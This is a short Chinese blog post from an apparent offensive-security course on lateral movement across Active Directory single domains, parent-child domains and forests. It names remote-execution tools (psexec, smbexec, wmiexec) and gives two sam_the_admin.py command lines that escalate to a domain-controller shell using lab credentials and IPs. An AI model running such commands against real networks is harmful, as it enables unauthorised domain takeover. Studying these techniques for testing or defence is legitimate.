EthanDoctor

内网对抗-横向移动篇&单域&父子域&域林&域森林&打点及信任&入口手法差异&思路方案

Ethan医生7个月前系统安全224

 横向移动-信息收集-单域&父子域&域森林

 横向移动-口令协议-单域&父子域&域森林

 横向移动-域控提权-单域&父子域&域森林

单域&父子域&域森林环境下:

1、多域信息收集差异

XDORG(xiaodi.org)

HRXRORG(hr.xiaodi.org)

HHRORG(h.hr.xiaodi.org)

GAXDORG(ga.xiaodi.org)

GGAORG(h.ga.xiaodi.org)

XIAODI8(xiaodi8.org)

 

2、口令协议横向移动差异(只要口令是对的 同网段所有的域机器都可以登入)

psexec smbexec wmiexec等

 

3、域控提权横向移动差异

python sam_the_admin.py hhrorg/'hhrpc:admin!@#45' -dc-ip 192.168.139.35 -shell

python sam_the_admin.py xdorg/'test:admin!@#45' -dc-ip 192.168.139.11 -shell

 

4、入口跳板机与打点及横向移动思路相呼应

场景1:入口机在h.hr.xiaodi.org下

场景2:入口机在hr.xiaodi.org下

场景2:入口机在xiaodi8.org下


标签: 横向移动篇
返回列表

上一篇:内网对抗-横向移动篇&域控系统提权&NetLogon&ADCS&PAC&KDC&永恒之蓝&CVE漏洞

下一篇:内网对抗-横向移动篇&工作组局域网&中间人攻击&ARP欺骗&DNS劫持&单双向&断网截获

相关文章

内网对抗-横向移动篇&NTLM中继&Relay重放&SMB&EWS&LADP协议&强制认证&钓鱼监听

内网对抗-横向移动篇&NTLM中继&Relay重放&SMB&EWS&LADP协议&强制认证&钓鱼监听

➢ 横向移动-NTLM监听-Responder&Inveigh➢ 横向移动-NTLM条件-强制触发&被动钓鱼➢ 横向移动-NTLM中继-暴力破解&...

Linux系统权限提升篇&Vulnhub&辅助项目&SUID权限&SUDO指令&版本漏洞

139#信息收集当前主机的操作系统hostnamectlcat /etc/*-releaselsb_release -acat /etc/lsb-release # Debaincat /etc/re...

内网对抗-权限维持篇&AD域&单机版&自启动五类&映像劫持&粘滞键&屏幕保护&Logon

➢ 权限维持-内网域&单机版-自启动手法➢ 权限维持-内网域&单机版-粘滞键后门➢ 权限维持-内网域&单机版-文件映像劫持➢ 权限维持-...

内网对抗-代理通讯篇&无外网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案

内网对抗-代理通讯篇&无外网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案

#代理技术-SockS配置-网络不可达-通讯解决解决:信息收集打点和漏洞利用部分注意:配置连接IP为C2服务器IP工具:Proxifier Proxychains等Proxifier使用:直接看课程演...

免杀对抗-C2远控篇&PowerShell&有无文件落地&C#参数调用&绕AMSI&ETW&去混淆特征

#C2远控-ShellCode-认知&环境1.创建工程时关闭SDL检查2.属性->C/C++->代码生成->运行库->多线程 (/MT)如果是debug则设置成MTD3...

免杀对抗-C2远控篇&C&C++&抗沙箱虚拟机&抗逆向调试&动态密钥抗分析&对抗VT云感知

对抗杀毒和感知云沙箱常见沙盒沙箱检测技术常见调试分析检测技术https://github.com/a0rtega/pafish/https://github.com/Arvanaghi/CheckPl...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号